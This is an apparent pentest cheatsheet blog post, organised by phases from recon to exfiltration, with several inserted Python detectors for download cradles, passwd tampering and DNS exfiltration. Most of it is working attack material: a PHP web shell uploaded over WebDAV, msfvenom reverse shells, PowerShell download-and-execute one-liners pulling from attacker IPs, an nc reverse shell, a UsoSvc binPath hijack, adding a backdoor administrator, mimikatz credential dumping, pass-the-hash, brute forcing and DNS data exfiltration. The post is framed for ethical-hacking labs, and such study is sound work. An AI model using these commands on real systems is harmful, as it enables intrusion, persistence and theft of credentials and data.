
This is the pentest cheatsheet for ethical hackers. It is a living document that grows and is refined over time, like an aged whiskey.

Want to try out pentesting yourself? This is the workhorse virtual lab setup and configuration I use for testing.

To make your own hacking lab, see my guide Set Up A Domain Controller to Hack At Home.

Setting up for reporting

My reporting tool of choice is CherryTree, mostly because KeepNote is no longer installed by default and it is known to crash. When you have done a ton of work and it is erased by a crash, that is no fun at all. The only remaining problem is how to get screenshots into CherryTree. The steps are simple. First I install gnome-screenshot, which does not come installed by default: apt install gnome-screenshot. Next, open the Keyboard settings app and create a new shortcut; give it something unique, as I did. Now open CherryTree and paste the new screenshot into an open node or sub-node.

Here I have added a new shortcut key to launch the gnome-screenshot application, so much better!

Add New Executables to PATH

You get new tools with git clone github.com/repo, and I usually then add the directory to my PATH by editing /root/.bashrc as follows:

# add to PATH
export PATH=$PATH:/usr/bin/dirsearch

# restart .bashrc shell settings
$ source /root/.bashrc

Phase I: Information Gathering

A favorite Nmap scan: scan all ports 1-65535 (-p-), detect service versions (-sV) and output in all formats (-oA).

nmap -sV -p- -oA nmap/this-new-scan 192.168.56.101

Nmap NSE Scripts

Locate the installed NSE scripts so you can use them (quote the pattern so the shell does not expand it).

locate "*.nse"

Nmap Script Scan for SMB

nmap -p- -A --script="smb-vuln*" $ip

# works more often
nmap -p 445 --script=vuln $ip

Nmap Script Scan for WebDAV

Run scan for WebDAV enabled devices.

nmap --script http-webdav-scan $ip

For a fast but thorough nmap scan try this.

$ nmap -p 1-65535 -T4 -A -v 10.0.0.1

Or the always useful combination of flags such as this one.

$ nmap -sC -sV -oA nmaps/new-nmap 10.0.0.1

Goscan

Try using GoScan.

https://github.com/marco-lancini/goscan

Bash Pingsweep

Using bash to do a ping sweep of the local subnet.

# -W 1 gives up on a silent host after one second
for i in $(seq 1 255); do ping -c 1 -W 1 10.x.x.$i; done

Telnet

Using telnet for banner grabbing.

telnet $ip $port

Auxiliary Metasploit Modules

Show auxiliary modules installed.

show auxiliary
use auxiliary/scanner/smb/smb_version

AutoRecon

Get AutoRecon by Tib3rius. I have spoken with the author, and many others say it is the best as well.

git clone https://github.com/Tib3rius/AutoRecon
pip3 install -r ~/AutoRecon/requirements.txt
# single quotes keep $PATH unexpanded until .bashrc is read; add the directory, not the script
echo 'export PATH=$PATH:~/AutoRecon/src/autorecon' >> ~/.bashrc
source ~/.bashrc
autorecon.py <target>

Onetwopunch

Get onetwopunch from the Github repo.

git clone https://github.com/superkojiman/onetwopunch
cp -r onetwopunch/onetwopunch.sh /usr/bin
root@kali:~# onetwopunch.sh -t ips.txt tcp

Reconnoitre

Get Reconnoitre for automated intel gathering.

git clone https://github.com/codingo/Reconnoitre.git
cd Reconnoitre
python setup.py install
reconnoitre -t 192.x.x.x -o /root/targets-intel --services
reconnoitre -t 192.x.x.x -o /root/targets-intel --services --pingsweep
reconnoitre -t 192.x.x.x -o /root/targets-intel --pingsweep --hostnames

Netcat for Port Scanning

# scan every port on each host listed in hostlist.txt
$ echo 10.0.0.1 > hostlist.txt
$ while read line; do nc -v -z $line 1-65535; done < hostlist.txt

# scan the port ranges listed in portlist.txt on one host
$ echo 1-65535 > portlist.txt
$ while read port; do nc -v -z 192.168.0.15 $port; done < portlist.txt

DNS Enumeration

Get basic DNS information.

# use nbtscan
nbtscan $ip

# use nmblookup 
nmblookup $ip

# nmap against a target range
nmap -sU -p 53 <ip-range> -vv -oA dns-scan

DNS Zone Transfer

# find DNS servers
host -t ns domain | cut -d " " -f 4

# zone transfer request
host -l domain dns-server-name

Using DNSRecon and DNSEnum

# dnsrecon
dnsrecon -d domain -t axfr

# dnsenum
dnsenum domain

Web Target Enumeration

Use gobuster.

Here is an example to use for general web/Apache web technologies being present.

gobuster -w /root/SecLists-master/Discovery/Web-Content/common.txt -u http://target

And another to use against Microsoft SQL Server instances.

gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-1.0.txt -u http://target

Updated 11-2019

gobuster dir -u http://10.0.0.2 -w ~/seclists/Discovery/Web-Content/common.txt -v

Install gobuster.

$ cd Downloads/
$ sudo tar -C /usr/local -xzf go1.12.7.linux-amd64.tar.gz

# add to PATH
$ nano /root/.bashrc
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$(go env GOPATH)/bin
export GOPATH=$(go env GOPATH)
$ source /root/.bashrc

# get the package
$ go get github.com/OJ/gobuster

# install 
$ cd ~/go/src/github.com/OJ/gobuster
$ go install

Or get the Debian package.

$ sudo apt-get install gobuster -y

Use gobuster to find common web files.

# use seclists common discovery list
gobuster -w seclist/Discovery/Web-Content/common.txt -u http://10.1.1.1

Use dirsearch.

git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSIONS> -w <WORDLIST>

python3 dirsearch.py -u http://10.0.0.2 -e html,aspx,php

Gobuster by design has no recursive option; recursive-gobuster wraps it to add one.

git clone https://github.com/epi052/recursive-gobuster
./recursive-gobuster/recursive-gobuster.pyz http://10.0.0.158

Active Directory Enumeration

Install windapsearch. You may need some dependencies first.

sudo apt-get install libsasl2-dev python-dev libldap2-dev libssl-dev
sudo pip3 install python-ldap

Whatweb

Use whatweb to enumerate the webserver running the web application.

$ whatweb 10.0.0.1

MS SQL Exploitation

Using Metasploit.

msf > use windows/mssql/mssql_payload

Here is how to connect to an MS SQL Server from Kali Linux.

sqsh -S [SQL_SERVER]

NFS Exploitation

Network File System (NFS) is a Unix network file sharing service.

# using rpcinfo
$ rpcinfo -p 10.0.0.1

# using nmap

# showmount will list exported folders
$ showmount -e 10.0.0.1

# display mount points
$ showmount -a 10.0.0.1

# display exported directories
$ showmount -d 10.0.0.1

# mount the share 
$ mount -t nfs 10.0.0.1:/ /mnt/tmp -o nolock

# verify new mount point
$ df -k

WordPress Exploitation

wpscan --url http://10.1.1.1/wp-login --passwords fsocity.dic -U elliot

Sometimes enumerating plugins requires aggressive detection mode.

wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p,u --plugins-detection aggressive

Try enumerating users.

wpscan --url $url --enumerate u

Exploiting a WordPress site can be done by injecting a PHP shell into a PHP file in the theme, such as archive.php. The script can then be called by browsing to wp-content/themes/themename/script.php while having a listener open at the same time.

Enumerating Users

Using the finger service.

http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

$ finger-user-enum.pl -t $target -U /wordlist.txt

$ finger <user>@$target

Get ident-user-enum for when you detect that TCP-113 ident protocol is open.

pentestmonkey.net/tools/user-enumeration/ident-user-enum

Vulnerability Scanners

Openvas

Install and use openvas.

sudo apt-get install openvas -y
openvas-setup
openvas-start
# web UI
https://127.0.0.1:9392

Nessus

Read the huge article I made for Nessus!

SNMP Enumeration

https://github.com/dheiland-r7/snmp

You can use snmp-check $ip to do a manual enumeration.

Phase II: Exploitation

DNSAdmins Group Exploit

# register the DLL as a DNS server plugin, then restart the service so it loads (sc.exe takes \\server before the command)
dnscmd.exe FQDN /config /serverplugindll \\kali-ip\share\myplugin.dll
sc.exe \\FQDN stop dns
sc.exe \\FQDN start dns

Freerdp

xfreerdp /u:cjosh4751 /p:iamgreat$1 /v:10.0.0.184

WebDAV Exploitation

Use cadaver.

cadaver http://10.0.0.1/webdav

Put a reverse shell on the webserver.

# single quotes: in double quotes the shell would expand $_REQUEST to nothing
echo '<?php system($_REQUEST["cmd"]); ?>' > /tmp/shell.php
put /tmp/shell.php
http://10.x.x.x/webdav/shell.php?cmd=ipconfig

File Upload Bypass Techniques

There are times when uploading a file with a certain extension is forbidden.

$ cadaver 10.0.0.1
dav:/> move my-shell.txt my-shell.php
dav:/> move my-shell.txt my-shell.asp;.txt

FTP Exploitation

See what accounts are present.

nmap --script "ftp*" $ip

Use hydra to crack user accounts.

hydra -L /root/seclist/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 10.1.1.1 ftp

SMTP Exploitation

Use smtp-user-enum to enumerate users on the system.

$ smtp-user-enum -M VRFY -U wordlist -t 10.0.0.1

Use nmap scripts to enumerate users.

$ nmap --script smtp-enum-users.nse -p 25 $ip

Use Metasploit’s auxiliary smtp module.

use auxiliary/scanner/smtp/smtp_enum 

SMB Exploitation

Use crackmapexec.

Basic discovery.

$ apt-get install crackmapexec
$ crackmapexec smb 10.0.0.0/24

Using credentials.

$ crackmapexec smb 10.0.0.0/24 -u admin -p password

Using Pass-the-Hash technique.

$ crackmapexec smb 10.0.0.0/24 -u admin -H <NTLM_HASH>

One starting point for SMB exploitation is finding the version of the SMB service running, for example Samba 2.x.x.

# use nbtscan
$ nbtscan $target

# use nmblookup
$ nmblookup -A 192.168.1.144
Looking up status of 192.168.1.144
 VULNSHARE02       <00> -         B <ACTIVE> 

# use smbclient: -L lists shares, -N means anonymous (no password) login
$ smbclient -L $target -N

# list shares by NetBIOS name or IP
$ smbclient -L <NETBIOS_NAME_OR_IP>

# connect to a share anonymously, or with a user and password
$ smbclient -N //192.168.1.144/c$
$ smbclient -U user //192.168.1.144/c$ PASSWORD

Use smbmap.

smbmap -H $target -u admin -p password

For brute forcing the shares' credentials use hydra.

hydra -L users-list.txt -P /usr/share/wordlists/metasploit/unix_passwords 192.x.x.x smb

Enumerate Samba shares across the network using smbmap.

smbmap -u john316 -p password123 -H 192.x.x.x

Use smbclient to access shares with READ/WRITE access.

smbclient //10.1.1.1/sharename

Enumerate users using nmap scripts.

nmap --script smb-enum-users.nse -p 445 10.1.1.1 

Brute force SMB logins using nmap.

nmap -vv -p 139,445 --script=smb-brute 10.0.2.18

Using medusa.

medusa -h 10.0.2.18 -P /usr/share/wordlists/rockyou.txt -U /root/seclist/Usernames/top-usernames-shortlist.txt -M smbnt

Compiling Exploits

If you need to compile using gcc try these:

sudo apt-get install gcc-multilib

There are many flags that can be used. For example, to compile for 32-bit targets try these:

-m32 (32-bit target)
-Wl,--hash-style=both (include both GNU and SysV hash tables; -Wl, passes comma-separated arguments to the linker)

Additionally to cross compile:

# install mingw cross-compiler 
sudo apt-get install mingw-w64

# compile a 32-bit Windows exe
i686-w64-mingw32-gcc -o exploit.exe exploit.c

# compile a 64-bit Windows exe
x86_64-w64-mingw32-gcc -o exploit.exe exploit.c

Searching In Searchsploit

Download the target.

searchsploit -m exploit-number

Print the exploit to the screen. BE WARNED this will open in vim, so use Esc then :q to exit.

searchsploit -x exploit-number

Run Popular Exploits

For running exploits on targets vulnerable to EternalBlue

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010/shellcode
sh prep.sh

Use Impacket

Setup is simple.

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python setup.py install
python wmiexec.py admin:<password>@<target>

Impacket – Move Files Post Exploit

smbserver.py -comment 'SHARE 01 Says Hi' SHARENAME /dir-to-share

Combining smbserver.py with the Windows copy command is a no-brainer, since copy is native to Windows.

Impacket – Get Compiled Version

Get the executable version of Impacket from github. All the scripts found in Impacket have been compiled for Windows and are hosted on this repository.

Web App Exploitation

If there is an application running that is susceptible to SQL injection then try these.

' or '1'='1

Netcat

Put simply, netcat is a *nix tool that allows the user to read and write to TCP or UDP connections. On the Kali host type the following to connect:

root@kali:~ netcat -nv 10.x.x.x 4400

On the Windows host, or in a shell via Metasploit, start the listener (a listener takes only the port):

netcat.exe -nlvp 4400

Sending Files with Netcat

On the sending side:

nc -v $destination_ip $port < file

On the receiving side:

nc -lvp $port > file

Cracking weak passwords

SecLists

Get SecLists for custom wordlists for brute forcing services.

wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip && unzip SecList.zip && rm -f SecList.zip

Use John’s builtin wordlist.

cp /usr/share/john/password.lst /root

Using ncrack.

ncrack -v 10.x.x.x:3389 --user admin -P /usr/share/wordlists/rockyou.txt

Using hashcat.

hashcat -m 1000 hashes-to-crack.txt /usr/share/wordlists/rockyou.txt

Using brutespray.

sudo apt install brutespray

# feed a recent nmap scan into spray and set service as ftp
brutespray --file top-20-ports-scan.xml --threads 20 -s ftp

Upgrading Your Shell

Try python-pty-shells.

https://github.com/infodox/python-pty-shells

Use Python if it is installed on the remote machine.

python -c 'import pty; pty.spawn("/bin/bash")'

Client-Side Attack

To run an msfvenom payload for a reverse shell on the client:

root@kali:~ systemctl start postgresql
root@kali:~ msfdb init
root@kali:~ msfconsole
msf > workspace -a scenario_1
msf > workspace scenario_1
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x -f exe -o /var/www/reverse_shell.exe
msf > cd /var/www
msf > python -m SimpleHTTPServer 8000
msf > service apache2 start

Every local file is now hosted on that ip:port.

Then there is netcat.

Post Exploitation Kali

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.x.x.x
msf5 exploit(multi/handler) > run
meterpreter > shell
Process 3912 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

Not a root level user, just a regular AD user.

C:\Users\Sam\Desktop>whoami
sam-pc\sam
C:\Users\Sam\Desktop> exit

Payload Generation

Msfvenom payloads come staged and unstaged. Staged payloads need a multi/handler listener while unstaged payloads do not.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=443 -f raw > shell-rev.php

UNSTAGED
msfvenom -p windows/shell_reverse_tcp -f <c|python|raw> LHOST=<ip> LPORT=<port>
msfvenom -p windows/x64/shell_reverse_tcp -f <c|python|raw> LHOST=<ip> LPORT=<port>

STAGED
msfvenom -p windows/shell/reverse_tcp -f <c|python|raw> LHOST=<ip> LPORT=<port>

Special PHP shells.

https://github.com/flozz/p0wny-shell

Phase III. Privilege Escalation

Windows Privilege Escalation

The Windows equivalent of the Linux cat command is type.

type flag.txt

See the current user.

echo %USERNAME%

See all users.

net users

Get accesschk.exe

wget https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

Do a search for the Windows local User Account Control bypass exploit, "bypassuac".

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac 
msf5 exploit(windows/local/bypassuac) > show options
msf5 exploit(windows/local/bypassuac) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/bypassuac) > run

Certutil to Move Files

certutil.exe -urlcache -split -f http://10.0.0.1/test.txt test.txt

Using cscript

cscript wget.vbs http://10.0.0.2/shell.ps1 shell.ps1

Win Priv Esc – PowerSploit

Powersploit repository

Win Priv Esc – PowerTools

Powertools repository

PowerShell

Moving Files to the Victim with PowerShell

In terms of working with tools native to Windows, PowerShell takes the cake. In other words, it is a great way to move the attack sequence along without having to bring a lot of tools onto the victim machine. Just for kicks we moved wget over to the Windows machine using netcat. PowerShell is installed by default on Windows hosts and has a pretty simple syntax for the one-liners we need to exploit further.

meterpreter > shell
C:\Windows\System32>cmd.exe
C:\Windows\System32>powershell
C:\Windows\System32>powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')

PowerSploit

Invoke–Shellcode (it used to be Invoke-Shellcode; the author likes to remind people to watch what they download freely from the internet) can be loaded into memory, thus avoiding writing anything at all to disk.

C:\> powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')"

With a PowerShell session already open on the target you can download further files.

PS c:\lowuser> IEX (New-Object Net.WebClient).downloadString('http://{kali ip addr}:8000/file.ps1')

PowerUp

Get PowerUp.ps1 onto the target or run the module in memory by using the following commands.

c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/PowerUp.ps1') ; Invoke-AllChecks"

c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/powerup.ps1') ; Invoke-AllChecks"

Alternatively once you have a PS session open on the target this will work as well.

PS C:\Users\bob\> IEX(New-Object Net.WebClient).downloadString('http://10.0.0.250/PowerUp.ps1'); Invoke-AllChecks

To run PowerUp.ps1 when it is already on the target run the following:

c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

# download PowerView from a PS session with Invoke-WebRequest (iwr)
iwr -uri http://kali:80/powerview.ps1 -outfile /tmp/powerview.ps1
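As an added defender-side example, not from the original post: a small Python scorer that flags process command lines (for instance from Sysmon process-creation events) carrying the download-cradle indicators seen in the commands above (IEX, DownloadString/DownloadFile, -exec bypass, raw-IP sources). The sample command lines, the indicator list and the weights are constructed for this example.

```python
import re
from typing import Dict, List

# Indicator patterns and weights (this example's own choice), matched
# case-insensitively after whitespace normalisation.
INDICATORS: Dict[str, int] = {
    r"\biex\b|invoke-expression": 3,
    r"downloadstring|downloadfile": 3,
    r"net\.webclient": 2,
    r"-exec(?:utionpolicy)?\s+bypass|-ep\s+bypass": 2,
    r"-nop\b|-noprofile\b": 1,
    r"-nologo\b": 1,
    r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/": 2,  # download from a raw IP address
    r"invoke-allchecks|find-allvulns|invoke-shellcode": 3,  # tool entry points named above
}


def normalise(cmdline: str) -> str:
    """Collapse whitespace and lowercase so spacing or casing tricks do not dodge a pattern."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def score_cmdline(cmdline: str) -> Dict[str, object]:
    """Return the summed weight of every indicator present and which ones matched."""
    text = normalise(cmdline)
    hits = [p for p in INDICATORS if re.search(p, text)]
    return {"score": sum(INDICATORS[p] for p in hits), "hits": hits}


def flag_cmdlines(cmdlines: List[str], threshold: int = 5) -> List[str]:
    """Keep the command lines whose score reaches the threshold (tune against your baseline)."""
    return [c for c in cmdlines if score_cmdline(c)["score"] >= threshold]


# Constructed sample command lines: two cradles like the ones above, two benign ones.
SAMPLE_CMDLINES = [
    'powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient)'
    '.downloadString(\'http://10.0.0.2:80/powerup.ps1\') ; Invoke-AllChecks"',
    "powershell.exe -exec bypass -c (new-object System.Net.WebClient).DownloadFile("
    "'http://10.0.0.2:8000/reverse_shell.exe','C:\\Windows\\Temp\\patch.exe')",
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "powershell.exe Get-Process | Out-File C:\\temp\\procs.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(score_cmdline(line)["score"], line[:60])
```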

Try using Sherlock or JAWS.

Sherlock

git clone https://github.com/rasta-mouse/Sherlock

Get Sherlock.ps1 onto the target or run the module in memory by using the following commands.

c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/Sherlock.ps1') ; Find-AllVulns"

Or if you have a PS session already opened use it this way.

IEX(New-Object Net.WebClient).downloadString('http://10.0.0.250/Sherlock.ps1') ; Find-AllVulns

First host Sherlock.ps1 on your Kali machine and transfer it to the target. To use Sherlock, call it from a PowerShell session on the target using a terminal shell:

powershell -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"

Yet another way to run Sherlock.

c:\> powershell -ep bypass
PS C:\> Import-Module .\Sherlock.ps1
PS C:\> Find-AllVulns

Watson

Watson is the updated version of Sherlock.

# get dependencies to compile
apt-get install -y nuget mono-devel mono-xbuild

# build the sln file
xbuild Watson.sln

# where to find compiled exe
/Watson-2.0/Watson/bin/Debug/watson.exe

To get the compiled binary to the host use wget.

PS > wget http://10.0.0.250/watson.exe -OutFile patch.exe
PS > ./patch.exe

JAWS

https://github.com/411Hall/JAWS

Windows Exploit Suggester

To use Windows Exploit Suggester, first run a command in the Windows shell to get the systeminfo command output.

C:\lowuser> systeminfo

Copy the output of this command into a text file, name it sysinfo.txt, and proceed.

# clone the repo
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester

# update the local db 
python windows-exploit-suggester.py --update

Now to use it to identify vulnerabilities. The --update command downloads the Microsoft security bulletin database locally.

python windows-exploit-suggester.py --systeminfo sysinfo.txt --database 2019-11-22-mssb.xls

You may need to install a dependency, to do so:

pip install xlrd

Python missing? Try Windows-exploit-suggester as a standalone binary.

root@kali: pyinstaller --onefile windows-exploit-suggester.py
cp windows-exploit-suggester.exe /usr/share/windows-binaries/wes.exe

Nishang

git clone https://github.com/samratashok/nishang

PSAttack

https://github.com/jaredhaight/PSAttack

Pre-compiled versions of common Windows exploits can be downloaded.

https://github.com/SecWiki/windows-kernel-exploits

Powerline

Get Powerline to target.

certutil -urlcache -split -f http://10.0.0.250/PowerLine.exe PowerLine.exe

Use Powerline to get a reverse shell.

PowerLine.exe Invoke-PowerShellTcp "Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.250 -Port 4444"

Powerview

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Internal Monologue

C:\>powershell.exe -nop "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/eladshamir/Internal-Monologue/master/Invoke-InternalMonologue.ps1');"

CVE-2019-1322 Windows 10 UsoSvc Exploit

PS C:\spongebob> sc.exe stop UsoSvc
PS C:\spongebob> sc.exe config usosvc binPath= "C:\Users\writeable\nc.exe 10.0.0.1 6666 -e cmd.exe"
PS C:\spongebob> sc.exe start UsoSvc

Linux privilege escalation

Get linpeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Get a script to suggest exploits.

https://www.securitysift.com/download/linuxprivchecker.py

Get linux-smart-enumeration tool.

https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

Get linenum tool.

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh 

Get Roothelper.

https://github.com/NullArray/RootHelper 

Find binaries with the SUID and SGID bits set. These let a normal user run them with the privileges of the file's owner (SUID) or group (SGID).

find / -user root -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# where SUID and SGID are both set (-perm -mode requires all listed bits, -perm /mode any of them)
find . -perm -6000 -type f 2>/dev/null

Use automated tools whenever possible. Make sure you try out linuxprivchecker.py.

git clone https://github.com/sleventyeleven/linuxprivchecker

Make the current user root. If you are able to write to /etc/passwd and you know the password for the current user, you can elevate that user to root.

# change the UID and GID to 0 for root
bobby:x:0:0::/home/bobby:/bin/sh
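As an added defender-side example, not from the original post: a Python audit that parses passwd-format text and flags exactly the kind of edit shown above (a non-root UID/GID 0 entry), along with a mode check for the writable /etc/passwd precondition. The sample passwd content is constructed for this example.

```python
import os
import stat
from typing import Dict, List

# Constructed sample passwd content, not from a real host. "bobby" has been
# given UID/GID 0 as described above; "svc" carries a hash in the password
# field, which belongs in /etc/shadow, not here.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bobby:x:0:0::/home/bobby:/bin/sh
svc:$6$abc:1001:1001:service:/var/svc:/bin/sh
"""


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Parse passwd-format text; blank, comment and malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # not a valid seven-field entry
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": uid, "gid": gid,
                        "home": home, "shell": shell})
    return entries


def find_passwd_anomalies(text: str) -> List[str]:
    """Flag UID/GID 0 accounts other than root, empty password fields and
    hashes stored directly in passwd, which is what the edit above leaves behind."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"{e['name']}: UID 0 but not root")
        if e["gid"] == "0" and e["name"] != "root":
            findings.append(f"{e['name']}: GID 0 but not root")
        if e["pw"] == "":
            findings.append(f"{e['name']}: empty password field")
        elif e["pw"] not in ("x", "*", "!", "!!"):
            findings.append(f"{e['name']}: password hash stored in passwd instead of shadow")
    return findings


def mode_is_world_writable(mode: int) -> bool:
    """True when the 'other' write bit is set, the precondition for the trick above."""
    return bool(mode & stat.S_IWOTH)


def audit_passwd_file(path: str = "/etc/passwd") -> Dict[str, object]:
    """Run both checks against a real file (needs read access to it)."""
    with open(path) as fh:
        text = fh.read()
    return {"world_writable": mode_is_world_writable(os.stat(path).st_mode),
            "anomalies": find_passwd_anomalies(text)}


if __name__ == "__main__":
    print(find_passwd_anomalies(SAMPLE_PASSWD))
```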

List Out Files Properly

This is the best way to do it.

find /home -printf "%f\t%p\t%u\t%g\t%m\t%n\n" 2>/dev/null | column -t

Use linux priv checker

git clone https://github.com/sleventyeleven/linuxprivchecker
cd linuxprivchecker
chmod 700 linuxprivchecker.py
python linuxprivchecker.py

Reverse Shell One Liners

# pentestmonkey one-liner - use it when nc -e is not a valid option (credit Jeff Price)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.100 4444 >/tmp/f

Cracking Passwords

How to crack found SSH RSA keys

Use ssh2john and then john to crack it.

wget https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
python ssh2john.py key > crackme.txt
john --wordlist=/usr/share/yourwords crackme.txt

Persistence

Using the net command add a new user. Next using the same command add the newly created user to the local administrators group.

meterpreter > sessions 2
meterpreter > shell
C:\Windows\System32>net user /add evil password
net user /add evil password
The command completed successfully.
C:\Windows\System32>net localgroup administrators evil /add
net localgroup administrators evil /add
The command completed successfully.

Phase IV: Moving Laterally

Pass-the-Hash

pth-winexe -U domain.local/Administrator%<LM_HASH>:<NT_HASH> //hostname.local cmd.exe

Meterpreter Shell

load kiwi
creds_all
load mimikatz
mimikatz_command -f samdump::hashes

Psexec

psexec \\$ip cmd.exe

Have Creds?

Use psexec from Impacket and open a new shell as another user.

python psexec.py testlab.local/Administrator:<password>@<target> cmd

CredNinja

Your output may look different, because I added a line in the Python script to print the command.

root@kali:~ python3 CredNinja.py -a accounts.txt -s servers.txt --valid
['smbclient', '-U', 'ethicalhackingguru\\\\Administrator', '\\\\10.x.x.x\\c$', 'Password123!', '-c', 'dir', '-m', 'SMB3']
10.x.x.x                          ethicalhackingguru\\Administrator Password123!                        LOCAL ADMIN! Valid   

Runas

Using runas with /netonly means running locally but authenticating as another user over the network.

C:\Users\skippy>runas /netonly /user:ethicalhackingguru\administrator cmd.exe

A new terminal is now open, titled cmd.exe (running as ethicalhackingguru\administrator).

SSH

Connecting to the target with the found passphrase and an RSA private key can be useful.

ssh -i rsa.key <user>@<target>

Phase V: Exfiltration

DNSteal

root@kali: git clone https://github.com/m57/dnsteal
python dnsteal.py 127.0.0.1 -z -s 4 -b 57 -f 17
DNSteal is like DNS weaponized!

DNSteal runs a DNS server listening for incoming DNS requests. By binding a socket to port 53 the tool receives these requests and uses them to move data. The commands used to drive the server are displayed; notice that they are ordinary *nix DNS commands. In other words, dig is used to exfiltrate files and folders.

Here I am pasting in the commands to be run by DNSteal.py
The schematics are in my inbox now bwuaha!
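As an added defender-side example, not from the original post: Python detection logic over a constructed DNS query log that flags clients sending many distinct, long, high-entropy subdomains to one domain, which is what a dnsteal-style transfer driven by dig looks like on the resolver. The sample queries are constructed, and the thresholds are this example's assumptions to tune against a real baseline.

```python
import math
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample DNS query log as (client_ip, qname) pairs; not real traffic.
# The long base64-looking labels under exfil.example mimic chunked file transfer;
# the other names are ordinary lookups.
SAMPLE_QUERIES: List[Tuple[str, str]] = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "mail.example.com"),
    ("10.0.0.5", "_dmarc.example.com"),
    ("10.0.0.7", "0.aGVsbG8gd29ybGQgdGhpcyBpcyBhIHNlY3JldCBmaWxl.UGFzc3dvcmQxMjM0NTY3ODkw.exfil.example"),
    ("10.0.0.7", "1.c2VjcmV0LnR4dCBjb250ZW50cyBjb250aW51ZWQgaGVyZQ.QUJDREVGR0hJSktMTU5PUFFSU1Q.exfil.example"),
    ("10.0.0.7", "2.bW9yZSBkYXRhIGZvciB0aGUgZXhmaWx0cmF0aW9u.MDEyMzQ1Njc4OWFiY2RlZmdoaWprbG1u.exfil.example"),
    ("10.0.0.7", "3.ZmluYWwgY2h1bmsgb2YgdGhlIGZpbGUgZ29lcyBoZXJl.enl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmE.exfil.example"),
    ("10.0.0.9", "cdn.static-assets.example.net"),
]


def shannon_entropy(s: str) -> float:
    """Bits per character: hostnames score low, encoded payload chunks score high."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Last two labels. Assumption: no public-suffix list, which is fine for this sample."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def qname_features(qname: str) -> Dict[str, float]:
    """Length, longest label and entropy of everything below the registered domain."""
    labels = qname.rstrip(".").split(".")
    payload = "".join(labels[:-2])
    return {
        "length": len(qname),
        "longest_label": max(len(label) for label in labels),
        "entropy": shannon_entropy(payload),
    }


def detect_dns_exfil(queries: List[Tuple[str, str]], max_label: int = 30,
                     min_entropy: float = 3.5, min_unique: int = 3) -> List[Tuple[str, str]]:
    """Return (client, registered_domain) pairs that sent at least min_unique distinct
    names whose labels are longer and more random than hostnames normally are."""
    suspicious: Dict[Tuple[str, str], set] = defaultdict(set)
    for client, qname in queries:
        f = qname_features(qname)
        if f["longest_label"] > max_label and f["entropy"] >= min_entropy:
            suspicious[(client, registered_domain(qname))].add(qname)
    return sorted(k for k, names in suspicious.items() if len(names) >= min_unique)


if __name__ == "__main__":
    print(detect_dns_exfil(SAMPLE_QUERIES))
```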

Check Existing Guides

https://malikashish8.github.io/Walkthrough/notes/
